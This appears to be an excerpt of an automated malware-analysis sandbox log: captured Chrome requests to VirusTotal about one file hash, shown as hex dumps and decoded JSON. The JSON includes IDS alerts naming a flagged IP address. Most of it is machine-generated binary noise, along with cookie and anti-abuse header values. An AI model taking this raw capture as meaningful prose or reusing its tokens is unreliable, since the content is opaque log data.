                                                                                                                                                                                                                    Data Ascii: cd>Hc)ER0v:g1su/157}e;!LX't+;u|pp#a5Z@6o$BXC5[s$Jtp.D`4U[-s~FI(5Q 6S,EfxjCAhzD1_MBLYojG,/jf)pBf#4
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1280INData Raw: 84 f2 0f 54 50 22 98 f3 64 cc f9 a1 a2 f3 24 cc 79 1f a5 3c ff 40 90 12 c6 7c 46 c6 7c 36 54 f4 19 ee cf e1 fc 03 c3 e0 54 86 d6 de 5a 1f b7 b7 68 b5 f6 96 78 bd bd 55 43 e0 88 c3 7e bf b8 92 c3 96 54 fa fd 92 30 18 33 f8 b0 36 2c 71 39 90 16 e9 54 81 20 ac 27 32 1f d2 b0 8f d3 96 e3 34 0c aa 58 a7 2c a3 33 ac 76 77 ce 39 12 18 cb 60 9b 10 d5 65 ec 12 12 b5 0a 86 ac 74 4d 89 e2 21 89 70 0d 2a fc 06 5a 66 3b 49 e5 19 44 3c ea e8 3f 50 17 5d 6c 57 82 68 df a2 50 62 13 4a e2 93 fc db 7d bc 60 ec 3f ca 2f 72 82 bc 1b 9c ca 10 e8 91 e8 65 85 1f 82 2d 2c 8e 98 89 6d cc ec cc 7b fd 2a 65 6f 66 ef 73 05 5a 64 d5 6b 55 76 0b 38 f3 71 f1 af 87 13 75 62 33 1b 7a 0e c3 97 e1 fb 1a 57 7d d8 cb aa b5 31 19 b8 b6 bf b2 c6 33 0b 70 75 14 1b 32 dd 84 57 aa 4c 12 89 c9 0a
                                                                                                                                                                                                                    Data Ascii: TP"d$y<@|F|6TTZhxUC~T036,q9T '24X,3vw9`etM!p*Zf;ID<?P]lWhPbJ}`?/re-,m{*eofsZdkUv8qub3zW}13pu2WL


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    148192.168.2.164989974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC550OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 93c30d46424ad9da35a4fe30a5797e25
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:30 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:30 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    149192.168.2.164990174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC565OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 079e9249e53e068a33705377474eec31
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    150192.168.2.164990074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTg5OTIyMjIxNzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Ng==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 5eae7cfdfcdb6cbeb8708578c6c1e9ac
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 228
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC228INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 70 65 5f 72 65 73 6f 75 72 63 65 5f 70 61 72 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    151192.168.2.164990374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC564OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 37d704c1b5bd4f348458a8a0bf11889d
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    152192.168.2.164990474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTk2NzM5OTgxMjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjQ5Nw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 477e6dc487b49d8f544c77073ed66e9f
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 478377
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:31 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 65 32 63 32 38 33 34 33 38 65 35 66 39 32 33 36 63 35 63 62 32 65 36 62 38 62 39 35 63 61 37 38 64 35 32 30 66 37 62 37 37 36 64 36 34 61 30 35 30 36 36 34 39 37 32 63 62 35 31 30 37 36 66 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 65 32 63 32 38 33 34 33 38 65 35 66 39 32 33 36 63 35 63 62 32 65 36 62 38 62 39 35 63 61 37
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/e2c283438e5f9236c5cb2e6b8b95ca7
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 6e 66 6f 22 3a 20 31 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 64 35 22 3a 20 22 63 37 36 64 35 64 39 32 37 31 36 38 36 36 61 31 31 38 33 30 31 33 32 37 39 33 64 62 35 64 63 34 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 74 69 6d 65 73 5f 73 75 62 6d 69 74 74 65 64 22 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 72 6f 77 64 73 6f 75 72 63 65 64 5f 69 64 73 5f 72 65 73 75 6c 74 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22
                                                                                                                                                                                                                    Data Ascii: , "info": 1 }, "md5": "c76d5d92716866a11830132793db5dc4", "times_submitted": 2, "crowdsourced_ids_results": [ { "rule_category"
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC546INData Raw: 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 69 70 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 72 63 5f 70 6f 72 74 22 3a 20 34 34 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 62 61 64 2d 75 6e 6b 6e 6f 77 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "src_ip": "5.8.63.140", "src_port": 443 } ] }, { "rule_category": "bad-unknown",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 3a 2f 2f 77 77 77 2e 73 6e 6f 72 74 2e 6f 72 67 2f 64 6f 77 6e 6c 6f 61 64 73 2f 23 72 75 6c 65 2d 64 6f 77 6e 6c 6f 61 64 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 72 61 77 22 3a 20 22 61 6c 65 72 74 20 28 20 67 69 64 3a 31 33 37 3b 20 73 69 64 3a 32 3b 20 72 65 76 3a 33 3b 20 6d 73 67 3a 5c 22 28 73 73 6c 29 20 69 6e 76 61 6c 69 64 20 73 65 72 76 65 72 20 48 45 4c 4c 4f 20 77 69 74 68 6f 75 74 20 63 6c 69 65 6e 74 20 48 45 4c 4c 4f 20 64 65 74 65 63 74 65 64 5c 22 3b 20 6d 65 74 61 64 61 74 61 3a 20 70 6f 6c 69 63 79 20 6d 61 78 2d 64 65 74 65 63 74 2d 69 70 73 20 64 72 6f 70 2c 20 72 75 6c 65 2d 74 79 70 65 20 70 72 65 70 72 6f 63 3b 20 63 6c 61 73 73 74 79 70 65 3a 62 61 64 2d 75 6e 6b 6e 6f
                                                                                                                                                                                                                    Data Ascii: ://www.snort.org/downloads/#rule-downloads", "rule_raw": "alert ( gid:137; sid:2; rev:3; msg:\"(ssl) invalid server HELLO without client HELLO detected\"; metadata: policy max-detect-ips drop, rule-type preproc; classtype:bad-unkno
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 6b 6e 6f 77 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 73 65 76 65 72 69 74 79 22 3a 20 22 6c 6f 77 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 6d 73 67 22 3a 20 22 28 68 74 74 70 5f 69 6e 73 70 65 63 74 29 20 48 54 54 50 20 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 20 6d 65 73 73 61 67 65 20 62 6f 64 79 20 77 61 73 20 74 72 75 6e 63 61 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: }, { "rule_category": "unknown", "alert_severity": "low", "rule_msg": "(http_inspect) HTTP Content-Length message body was truncated",
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1280INData Raw: 5f 69 6e 73 70 65 63 74 29 20 55 52 49 20 70 61 74 68 20 63 6f 6e 74 61 69 6e 73 20 63 6f 6e 73 65 63 75 74 69 76 65 20 73 6c 61 73 68 20 63 68 61 72 61 63 74 65 72 73 5c 22 3b 20 6d 65 74 61 64 61 74 61 3a 20 72 75 6c 65 2d 74 79 70 65 20 70 72 65 70 72 6f 63 3b 20 73 65 72 76 69 63 65 3a 68 74 74 70 3b 20 63 6c 61 73 73 74 79 70 65 3a 6e 6f 74 2d 73 75 73 70 69 63 69 6f 75 73 3b 29 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 63 6f 6e 74 65 78 74 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 69 70 22 3a 20 22 39 39 2e 38 36 2e
                                                                                                                                                                                                                    Data Ascii: _inspect) URI path contains consecutive slash characters\"; metadata: rule-type preproc; service:http; classtype:not-suspicious;)", "alert_context": [ { "dest_ip": "99.86.
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 33 5f 31 32 3b 29 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 65 72 74 5f 63 6f 6e 74 65 78 74 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 69 70 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 35 2e 38 2e 36 33 2e 31 34 30 22 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: 3_12;)", "alert_context": [ { "dest_ip": "5.8.63.140", "dest_port": 443, "hostname": "5.8.63.140"
                                                                                                                                                                                                                    2024-04-25 19:55:31 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 69 70 22 3a 20 22 38 2e 38 2e 38 2e 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 74 5f 70 6f 72 74 22 3a 20 35 33 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 75 6c 65 5f 63 61 74 65 67 6f 72 79 22 3a 20 22 4d 69 73 63 20 61 63 74 69 76 69 74 79
                                                                                                                                                                                                                    Data Ascii: "dest_ip": "8.8.8.8", "dest_port": 53 } ] }, { "rule_category": "Misc activity
